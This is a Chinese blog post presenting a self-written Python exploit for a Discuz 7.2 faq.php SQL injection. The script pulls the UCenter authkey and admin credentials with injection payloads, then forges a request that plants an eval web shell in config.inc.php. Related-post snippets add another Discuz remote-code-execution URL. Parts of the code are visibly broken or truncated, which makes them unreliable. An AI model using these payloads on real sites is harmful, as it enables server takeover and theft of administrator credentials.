discuz 7.2 faq.php sql注入漏洞,Discuz <= 7.2 /faq.php SQL注入漏洞 EXP

最新推荐文章于 2022-04-18 09:36:30 发布
最新推荐文章于 2022-04-18 09:36:30 发布
阅读量458 收藏
点赞数
文章标签: discuz 7.2 faq.php sql注入漏洞

具体漏洞详情我就不多说了,大家可以看freebuf的介绍,链接在下方:

http://www.freebuf.com/vuls/37643.html

看了网上公布的一大堆exp,发现都不是很好用,就自己写了一个

获取管理员帐号密码以及uc_key的就不说了,构造语句就可以了,主要在于getshell,思路主要都是参照http://www.wooyun.org/bugs/wooyun-2014-048137,不过dz7.2跟dz2.x的目录结构是不同的,没有config/config.php目录(我从官方下载的),反正废话不说,直接贴代码了

#!/usr/bin/env python

# coding: utf-8

# Fooying@2014-06-30 23:42:25

'''

Discuz 7.2 /faq.php SQL注入漏洞利用程序

请勿用于非法行为,否则后果自负

'''

import sys

import urllib2

import urllib

import hashlib

import time

import math

import base64

HELP_STR = '''

=======================================================

Discuz <= 7.2 faq.php sqlinj Getshell

Autor:Fooying http://www.fooying.com

=======================================================

Usage:

python dz7.2_key_getshell.py url method_code(1/2/3)

Method code:

1、get_shell

2、get key

3、get admin

input -h or --help get help

=======================================================

'''

GET_KEY_PAYLOAD = ('/faq.php?action=grouppermission&gids[99]=%27'

'&gids[100][0]=)%20union%20select%201%20from%20(select%20coun'

't(*),concat(0x236623,(select%20md5(authkey)%20from%20cdb_uc_ap'

'plications%20limit%201),0x236623,floor(rand(0)*2))a%20from%20i'

'nformation_schema.tables%20group%20by%20a)b--%20a'

)

GET_ADMIN_PAYLOAD = ('/faq.php?action=grouppermission&gids[99]=%27&'

'gids[100][0]=) and (select 1 from (select count(*),concat((sele'

'ct (select (select concat(0x236623,username,0x236623,password,0'

'x236623,salt,0x236623) from cdb_uc_members limit 1) ) from `inf'

'ormation_schema`.tables limit 0,1),floor(rand(0)*2))x from info'

'rmation_schema.tables group by x)a)%23'

)

GET_SHELL_PALOAD = ('''<?xml version="1.0" encoding="ISO-8859-1"?>

'''ot>https://sb\');eval(\$_REQUEST[f]);#'''

)

def url_format(url):

if not url.startswith(('http://', 'https://')):

url += 'http://'

if url.endswith('/'):

url = url[:-1]

return url

def url_request(url, data=None):

headers ={

'User-Agent' : ('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) '

'AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16'

),

}

try:

req = urllib2.Request(url, data=data, headers=headers)

ret = urllib2.urlopen(req)

except Exception, e:

print 'request error:%s' %e

return None

else:

return ret.read()

def get_error_content(text):

text = text.split('Error:')

if len(text) > 1:

text = text[1]

text = text.split('Errno.:')[0]

text = text.replace('
', '')

text = text.strip()

return text

return ''

def get_authcode(string, key):

ckey_length = 4;

key = hashlib.md5(key).hexdigest();

keya = hashlib.md5(key[0:16]).hexdigest();

keyb = hashlib.md5(key[16:32]).hexdigest();

microtime = '%.8f %d' % math.modf(time.time())

keyc = (hashlib.md5(microtime).hexdigest())[-ckey_length:]

cryptkey = keya + hashlib.md5(keya+keyc).hexdigest()

key_length = len(cryptkey)

string = '0000000000' + (hashlib.md5(string+keyb)).hexdigest()[0:16]+string

string_length = len(string)

count = 0

box = range(256)

for n in range(256):

randkey = ord(cryptkey[n % key_length])

count = (count + box[n] + randkey) % 256

tmp = box[n]

box[n] = box[count]

box[count] = tmp

i = j = 0

result = ''

for n in range(string_length):

i = (i + 1) % 256

j = (j + box[i]) % 256

tmp = box[i]

box[i] = box[j]

box[j] = box[i]

result += chr(ord(string[n]) ^ (box[(box[i] + box[j]) % 256]))

result = base64.b64encode(result).replace('=', '')

return keyc + result

def get_shell(url, key):

host = url

query_string = 'time=%s&action=updateapps' % time.time()

code = urllib.quote(get_authcode(query_string, key))

url += '?code=%s' % code

text = url_request(url, GET_SHELL_PALOAD)

if text != None:

print 'get shell succeeful!the shell url:%s/config.inc.php, pass:f' % host

def get_key(url):

url += GET_KEY_PAYLOAD

text = url_request(url)

if text:

text = get_error_content(text)

if '#f#' in text:

key = text.split('#f#')[1]

print '=========================================='

print 'Key: %s' % key

print '=========================================='

return key

else:

print 'get key error!\n'

print text + '\n'

def get_admin(url):

url += GET_ADMIN_PAYLOAD

text = url_request(url)

if text:

text = get_error_content(text)

if '#f#' in text:

keys = text.split('#f#')

username = keys[1]

password = keys[2]

salt = keys[3]

print '=========================================='

print 'Username:%s\nPassword:%s\nSalt:%s' % (username, password, salt)

print '=========================================='

else:

print 'get admin error!\n'

print text + '\n'

def main(url, method_code=1):

url = url_format(url)

if method_code == '2':

get_key(url)

elif method_code == '3':

get_admin(url)

else:

key = get_key(url)

if key:

get_shell(url, key)

else:

print 'Get shell error: There is a problem with get key!'

if __name__ == '__main__':

keys = sys.argv

if '-h' in keys or '--help' in keys or len(keys)!=3:

print HELP_STR

else:

main(keys[1], keys[2])

效果如下:

6eb9da7979cc39297dcb7e77ca50af26.png

3135b00fc9c61b40aa6edcd48ebc577b.png

fd543cd88fe17666d32fe56208b0e889.png

b3abb9902fabadf547120ee1a09955a1.png

文件下载:http://pan.baidu.com/s/1o6JREVC 密码:06r8

关注公众号:拾黑(shiheibook)了解更多

[广告]赞助链接:

不撕
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
discuz7.2漏洞分析
qq_38415434的博客
08-07 868
一 参数的入口 这段话的意思时遍历三种提交的方法,获取参数传递的值。 有一个函数是daddslashes,跟进看一下。 这段代码的意思是对数据里的每一个字符都进行转义处理 二 漏洞产生的代码在faq.php195行 跟进implodeid函数,在faq.php的675行 这个函数的功能将数组里的值拆分出来,如图 到了这里我们知道,如果数组值当中存在在 / 或者 ’ ,那么在拼接s...
Discuz 7.2漏洞入侵图解
kuxing100的专栏
05-06 4399
Discuz 7.2漏洞入侵图解 找到一个论坛,注册一个账号 注册好后,使用exp 复制以下代码: http://此处为论坛地址/misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]=${${eval(chr(102).chr(112).chr(117).chr(11
php 7.2.2bug,Discuz 7.2版本高危漏洞bug修复
weixin_42502775的博客
03-11 377
使用discuz建站的朋友们应该都知道,discuz现在已经更新到X3.2版本了,功能也和旧版本有了一些区别。小编今天在逛论坛看到一个关于discuz老版本的消息,说的是Discuz! 7.2 系列论坛程序中含有高危安全漏洞。内容如下:根据相关安全组织的报告, Discuz! 7 系列论坛程序中含有高危安全漏洞。为保障您的论坛数据不被破坏, 请各位站长立即进行修复或者防御,以免遭受到攻击。流动主要...
Discuz! 7.1 & 7.2 远程代码执行漏洞
weixin_34198453的博客
10-31 336
受影响产品: Discuz! 7.1 &amp; 7.2 漏洞描述: 产生漏洞的$scriptlang数组在安装插件后已经初始化 Discuz!新版本7.1与7.2版本中的showmessage函数中eval中执行的参数未初始化,可以任意提交,从而可以执行任意PHP命令。 下面来分析下这个远程代码执行漏洞,这个问题真的很严重,可以直接写shell的: 一、漏洞来...
discuz php7.1,Discuz! 7.1 & 7.2 远程代码执行漏洞
weixin_29192365的博客
04-12 732
特别说明:产生漏洞的$scriptlang数组在安装插件后已经初始化,因此有安装插件的用户不受影响。漏洞介绍:Discuz!新版本7.1与7.2版本中的showmessage函数中eval中执行的参数未初始化,可以任意提交,从而可以执行任意PHP命令。漏洞分析:下面来分析下这个远程代码执行漏洞,这个问题真的很严重,可以直接写shell的:一、漏洞来自showmessage函数:functions...
Discuz7.2版的faq.php SQL注入漏洞分析
10-25
主要介绍了Discuz7.2版的faq.php SQL注入漏洞分析,包含注入代码和源码分析,需要的朋友可以参考下
Python写的Discuz7.2faq.php注入漏洞工具
12-25
Discuz 7.2 faq.php全自动利用工具,getshell 以及dump数据,python 版的uc_key getshell部分的代码来自网上(感谢作者) 实现代码: #!/usr/bin/env python # -*- coding: gbk -*- # -*- coding: gb2312 -*- # -*- ...
discuz7.2注入漏洞faq.php
01-08
复现discuz7.2注入漏洞
discuzphp防止sql注入函数
12-17
有特别要求需要过滤一些字符防止sql注入。本来这方面就没有特别的研究过。呵呵,又发扬了一回拿来主义。把discuz论坛的sql防注入函数取了来! 复制代码 代码如下: $magic_quotes_gpc = get_magic_quotes_gpc(); @...
discuz漏洞汇总
热门推荐
hacker0ne的博客
05-05 5万+
Discuz漏洞拿服务器 路径泄露 ‘api/addons/zendcheck.php’, ‘api/addons/zendcheck52.php’, ‘api/addons/zendcheck53.php’, ‘source/plugin/mobile/api/1/index.php’, ...
Discuz全版本任意文件删除漏洞
zsd747289639的博客
09-30 4830
Discuz全版本任意文件删除漏洞验证用的版本:discuz3.2 0x1首先在根目录下新建一个文件 0x2 构造poc1修改出生地区 注意其中的formhash需要替换掉,具体是在源码中找。 为什么这里要替换掉formhash呢? 一开始不太清楚,网页会报错,如下看到了有一个xss验证蛮去找一下这个文件private function _xss_check() { stat
Discuz!7.2 SQL注入复现实验
Tranquillity
10-23 2130
0x01 实验准备 实验原理: 实验工具: UCenter Discuz 7.2安装包 实验环境: 安装 Discuz 网站的服务器(Windows) 安装 python 环境的攻击机 0x01 实验步骤 一、搭建环境 1. 安装UCenter 通过 http://192.168.88.129/dz7.2/upload/install/index.php 页面安装: 出现错误: 将UCenter文件放置在dz7.2文件夹下,访问http://192.168.88.129/dz7.2/UCente
discuz7.2漏洞复现--python编写poc
m0_65129142的博客
12-21 1089
环境搭建 准备一台win7装上的phpstudy 将discuz7.2源码放进去 安装discuz之前,需要先安装center 文件夹搭建存放的位置是: 解压完成之后更改名称 再然后需要把ucenter放到discuz源码下边 开始安装 安装discuz之前 首先需要安装ucenter 我们先将源码拉进phpstudy根目录下边 首先安装ucenter 需要填的只有标红框的 安装完成之后 我们进行安装2 最关键的一步来了 需要将ucenter的url修改成http://192.168.
discuz 7.2 SQL 注入漏洞分析
weixin_33860722的博客
01-28 601
2019独角兽企业重金招聘Python工程师标准>>> ...
Discuz 7.2/X1 第三方插件SQL注入及持久型XSS漏洞
swordheart的博客
04-18 4753
漏洞详情 披露状态: 2010-07-31: 细节已通知厂商并且等待厂商处理中 2010-08-01: 厂商已经确认,细节仅向厂商公开 2010-08-11: 细节向核心白帽子及相关领域专家公开 2010-08-21: 细节向普通白帽子公开 2010-08-31: 细节向实习白帽子公开 2010-08-31: 细节向公众公开 简要描述: Discuz7.2/X1 第三方插件SQL注入及持久型XSS漏洞SQL注入比较鸡肋,要求GPC为off(目前这样的网站几乎绝版了) XSS因为是持久型的,只要
php discuzSQL注入_Discuz7.2版的faq.php SQL注入漏洞分析
weixin_39866867的博客
03-08 129
这篇文章主要介绍了Discuz7.2版的faq.php SQL注入漏洞分析,包含注入代码和源码分析,需要的朋友可以参考下注入代码实例://www.jb51.net/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) and (select 1 from (select count(*),concat((select ...
discuz faq.php,Python Discuz 7.2 faq.php 注入漏洞全自动利用工具
weixin_42512798的博客
03-10 130
#!/usr/bin/envpython#-*-coding:gbk-*-#-*-coding:gb2312-*-#-*-coding:utf_8-*-#authoriswinimportsysimporthashlibimporttimeimportmathimportbase64importurllib2importurllibimportrede...
7.2 discuz 拿shell_DZ 7.2 漏洞 - Discuz!-BUG与问题交流 - Discuz! 官方站 - Powered by Discuz!...
weixin_39748928的博客
12-22 343
我网站 最近老被入侵就在网上 查了查 不知道官网 我转了2个 入侵方法 过来 请 官网管理 和各位高手 看看该怎么预防/manyou/admincp.php?my_suffix=%0A%0DTOBY57 爆路径然后直接getshelluserapp.php?script=notice&view=all&option=deluserapp&action=invite&am...
php discuzSQL注入_Discuz 7.2 /search.php SQL注入漏洞
最新发布
05-24
Discuz 7.2 版本的 search.php 存在 SQL 注入漏洞。 攻击者可以通过构造特定的搜索参数,向数据库中插入恶意代码。例如,以下 URL 将会向 discuz 数据库中的 pre_common_member 表中插入一条数据: ``` ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值